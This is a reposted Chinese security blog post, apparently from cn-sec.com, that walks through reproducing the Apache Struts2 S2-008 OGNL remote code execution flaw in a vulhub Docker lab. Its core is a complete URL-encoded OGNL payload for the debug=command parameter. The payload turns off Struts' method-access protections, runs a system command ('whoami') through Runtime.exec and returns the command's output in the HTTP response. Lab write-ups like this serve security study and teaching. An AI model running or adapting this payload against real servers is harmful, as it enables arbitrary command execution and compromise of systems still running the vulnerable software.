S2-008远程代码执行漏洞 poc

admin 2025年3月5日20:41:09评论8 views字数 995阅读3分19秒阅读模式

S2-008远程代码执行漏洞

漏洞成因

?debug=command&expression=处存在OGNL远程代码执行漏洞

漏洞利用

环境准备

名称
IP
攻击机
192.168.159.135
靶机
192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/struts2/s2-008
docker-compose up -d
S2-008远程代码执行漏洞 poc
image-20220804155614435

看到如上界面便是启动成功了。

漏洞复现

抓包devmode.action在域名后面拼接如下内容:

?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22whoami%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

可以看到如下返回结果,证明该漏洞利用成功

S2-008远程代码执行漏洞 poc
image-20220804162133615

原文始发于微信公众号(0xh4ck3r):S2-008远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月5日20:41:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   S2-008远程代码执行漏洞 pochttps://cn-sec.com/archives/3798092.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息